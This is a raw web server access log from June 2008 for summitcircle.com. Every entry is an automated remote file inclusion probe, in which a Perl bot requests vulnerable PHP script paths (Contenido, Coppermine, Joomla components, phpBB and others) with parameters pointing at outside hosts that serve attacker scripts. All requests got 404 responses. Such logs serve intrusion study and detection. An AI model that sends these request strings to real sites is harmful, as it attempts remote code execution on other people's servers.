64.27.83.240 - - [15/Jun/2008:19:12:12 -0700] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
217.67.237.142 - - [15/Jun/2008:19:12:27 -0700] "GET /logs/access_080127.log/index1.php?x=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
217.67.237.142 - - [15/Jun/2008:19:12:27 -0700] "GET /index1.php?x=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.80.152.210 - - [15/Jun/2008:19:12:27 -0700] "GET /logs//includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=http://www.ontmoetengroet.nl/cgi-bin/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.80.152.210 - - [15/Jun/2008:19:12:27 -0700] "GET //includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=http://www.ontmoetengroet.nl/cgi-bin/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.67.237.142 - - [15/Jun/2008:19:12:27 -0700] "GET /logs/index1.php?x=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.80.152.210 - - [15/Jun/2008:19:12:28 -0700] "GET /logs/access.log//includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=http://www.ontmoetengroet.nl/cgi-bin/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.192.70.11 - - [15/Jun/2008:19:12:34 -0700] "GET /logs/access_080127.log/index1.php?x=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
82.192.70.11 - - [15/Jun/2008:19:12:35 -0700] "GET /index1.php?x=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
82.192.70.11 - - [15/Jun/2008:19:12:35 -0700] "GET /logs/index1.php?x=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
217.67.237.142 - - [15/Jun/2008:19:12:35 -0700] "GET /logs/access_070924.log/index1.php?x=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
121.254.170.200 - - [15/Jun/2008:19:12:40 -0700] "GET /logs/access.log//contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
121.254.170.200 - - [15/Jun/2008:19:12:40 -0700] "GET //contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
121.254.170.200 - - [15/Jun/2008:19:12:40 -0700] "GET /logs//contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.192.70.11 - - [15/Jun/2008:19:12:41 -0700] "GET /logs/access_070924.log/index1.php?x=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:19:12:48 -0700] "GET /logs/access.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:19:12:49 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:19:12:49 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:12:57 -0700] "GET /logs/access_071231.log//index.php?pagina=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:12:57 -0700] "GET //index.php?pagina=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:12:57 -0700] "GET /logs//index.php?pagina=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
205.234.233.66 - - [15/Jun/2008:19:12:59 -0700] "GET /logs/access_080120.log/home.php?content=http://ratpox.com/photos/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
205.234.233.66 - - [15/Jun/2008:19:12:59 -0700] "GET /home.php?content=http://ratpox.com/photos/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
205.234.233.66 - - [15/Jun/2008:19:12:59 -0700] "GET /logs/home.php?content=http://ratpox.com/photos/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:13:02 -0700] "GET /logs/access_071231.log//index.php?pagina=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:13:02 -0700] "GET //index.php?pagina=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:13:02 -0700] "GET /logs//index.php?pagina=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
205.234.233.66 - - [15/Jun/2008:19:13:06 -0700] "GET /logs/access_080114.log/home.php?content=http://ratpox.com/photos/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
62.43.197.73 - - [15/Jun/2008:19:13:44 -0700] "GET /logs/access_080210.log/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.43.197.73 - - [15/Jun/2008:19:13:44 -0700] "GET /shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.43.197.73 - - [15/Jun/2008:19:13:44 -0700] "GET /logs/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
58.226.23.119 - - [15/Jun/2008:19:14:09 -0700] "GET /logs/access_071224.log//index.php?pagina=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.226.23.119 - - [15/Jun/2008:19:14:09 -0700] "GET //index.php?pagina=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.226.23.119 - - [15/Jun/2008:19:14:10 -0700] "GET /logs//index.php?pagina=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:14:20 -0700] "GET /logs/access.log//contenido/index.php?contenido=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:14:20 -0700] "GET //contenido/index.php?contenido=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:14:20 -0700] "GET /logs//contenido/index.php?contenido=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:14:44 -0700] "GET /logs/access.log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:14:44 -0700] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:14:44 -0700] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:15:20 -0700] "GET /logs/access_071224.log//index.php?pagina=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:15:20 -0700] "GET //index.php?pagina=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:15:20 -0700] "GET /logs//index.php?pagina=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.105.208.186 - - [15/Jun/2008:19:16:10 -0700] "GET /logs/access.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.105.208.186 - - [15/Jun/2008:19:16:10 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.105.208.186 - - [15/Jun/2008:19:16:16 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:16:19 -0700] "GET /logs/access_071029.log//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:16:19 -0700] "GET /logs/access_071029.log//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:16:20 -0700] "GET //index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:16:20 -0700] "GET //index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:16:20 -0700] "GET /logs//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:16:20 -0700] "GET /logs//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
65.38.105.133 - - [15/Jun/2008:19:16:46 -0700] "GET /logs/access_071231.log//index.php?pagina=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
65.38.105.133 - - [15/Jun/2008:19:16:46 -0700] "GET //index.php?pagina=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
65.38.105.133 - - [15/Jun/2008:19:16:46 -0700] "GET /logs//index.php?pagina=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:16:59 -0700] "GET /logs/access.log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:16:59 -0700] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:17:00 -0700] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
201.12.149.44 - - [15/Jun/2008:19:17:03 -0700] "GET //admin/admin_users.php?phpbb_root_path=http://www.joerg-krug.de/vnc/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
217.67.237.142 - - [15/Jun/2008:19:17:15 -0700] "GET /logs/access_080114.log/home.php?content=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
217.67.237.142 - - [15/Jun/2008:19:17:15 -0700] "GET /home.php?content=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
217.67.237.142 - - [15/Jun/2008:19:17:16 -0700] "GET /logs/home.php?content=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.137.18 - - [15/Jun/2008:19:17:19 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
217.67.237.142 - - [15/Jun/2008:19:17:21 -0700] "GET /logs/access_071203.log/home.php?content=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:17:21 -0700] "GET /logs/access_071231.log//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:17:21 -0700] "GET /logs/access_071231.log//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:17:21 -0700] "GET //index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:17:21 -0700] "GET //index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:17:21 -0700] "GET /logs//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
216.117.140.139 - - [15/Jun/2008:19:17:21 -0700] "GET /logs//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
74.53.137.18 - - [15/Jun/2008:19:17:38 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.137.18 - - [15/Jun/2008:19:17:39 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:17:45 -0700] "GET /logs/access.log//contenido/index.php?contenido=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:17:45 -0700] "GET //contenido/index.php?contenido=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:17:46 -0700] "GET /logs//contenido/index.php?contenido=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
74.53.137.18 - - [15/Jun/2008:19:18:05 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
62.43.197.73 - - [15/Jun/2008:19:18:18 -0700] "GET /logs/access_080526.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:18:20 -0700] "GET /logs/access_071231.log//index.php?pagina=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:18:20 -0700] "GET //index.php?pagina=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:18:20 -0700] "GET /logs//index.php?pagina=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
150.165.231.5 - - [15/Jun/2008:19:19:17 -0700] "GET /index.php?p=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:19:23 -0700] "GET /logs/access_071029.log//index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:19:23 -0700] "GET //index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:19:23 -0700] "GET /logs//index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:19:56 -0700] "GET /logs/access_071029.log//index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:19:56 -0700] "GET //index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:19:57 -0700] "GET /logs//index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:20:08 -0700] "GET /logs/access.log//contenido/backend_search.php?contenido_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:20:08 -0700] "GET //contenido/backend_search.php?contenido_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:20:08 -0700] "GET /logs//contenido/backend_search.php?contenido_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
85.214.28.45 - - [15/Jun/2008:19:20:12 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
85.214.28.45 - - [15/Jun/2008:19:20:12 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:20:38 -0700] "GET /logs/access_071231.log//index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:20:38 -0700] "GET //index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:20:39 -0700] "GET /logs//index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
65.38.105.133 - - [15/Jun/2008:19:21:00 -0700] "GET /logs/access_071029.log//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
65.38.105.133 - - [15/Jun/2008:19:21:00 -0700] "GET //index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
65.38.105.133 - - [15/Jun/2008:19:21:00 -0700] "GET /logs//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.250.121.2 - - [15/Jun/2008:19:21:11 -0700] "GET /logs/access_071111.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:21:12 -0700] "GET /logs/access_071231.log//index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
200.250.121.2 - - [15/Jun/2008:19:21:12 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.250.121.2 - - [15/Jun/2008:19:21:14 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:21:15 -0700] "GET //index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
65.42.183.2 - - [15/Jun/2008:19:21:16 -0700] "GET /logs//index.php?dir=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
193.140.181.20 - - [15/Jun/2008:19:21:26 -0700] "GET /logs/access_071029.log/inc/cmses/aedatingCMS.php?dir[inc]=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.140.181.20 - - [15/Jun/2008:19:21:26 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.140.181.20 - - [15/Jun/2008:19:21:27 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
84.243.253.159 - - [15/Jun/2008:19:21:31 -0700] "GET //index.php?pagina=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
84.243.253.159 - - [15/Jun/2008:19:21:31 -0700] "GET //index.php?pagina=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
67.225.198.22 - - [15/Jun/2008:19:22:02 -0700] "GET /logs/index1.php?x=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
84.243.253.159 - - [15/Jun/2008:19:22:12 -0700] "GET //index.php?pagina=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
84.243.253.159 - - [15/Jun/2008:19:22:12 -0700] "GET //index.php?pagina=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.192.70.11 - - [15/Jun/2008:19:22:22 -0700] "GET /logs/access_080114.log/home.php?content=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
82.192.70.11 - - [15/Jun/2008:19:22:22 -0700] "GET /home.php?content=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
82.192.70.11 - - [15/Jun/2008:19:22:23 -0700] "GET /logs/home.php?content=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
82.192.70.11 - - [15/Jun/2008:19:22:24 -0700] "GET /logs/access_071203.log/home.php?content=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
65.38.105.133 - - [15/Jun/2008:19:22:54 -0700] "GET /logs/access_071231.log//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
65.38.105.133 - - [15/Jun/2008:19:22:54 -0700] "GET //index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
65.38.105.133 - - [15/Jun/2008:19:22:54 -0700] "GET /logs//index.php?dir=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:24:00 -0700] "GET /logs/access_071029.log//index.php?dir=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:24:00 -0700] "GET //index.php?dir=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:24:00 -0700] "GET /logs//index.php?dir=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.26.142.244 - - [15/Jun/2008:19:24:08 -0700] "GET /logs/access_080128.log/index.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.26.142.244 - - [15/Jun/2008:19:24:08 -0700] "GET /index.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.26.142.244 - - [15/Jun/2008:19:24:09 -0700] "GET /logs/index.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
67.225.198.22 - - [15/Jun/2008:19:24:15 -0700] "GET /logs/access_080120.log/home.php?content=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
200.250.121.2 - - [15/Jun/2008:19:24:17 -0700] "GET /logs/access_080121.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.225.198.22 - - [15/Jun/2008:19:24:20 -0700] "GET /logs/home.php?content=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
67.225.198.22 - - [15/Jun/2008:19:24:27 -0700] "GET /logs/access_080114.log/home.php?content=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
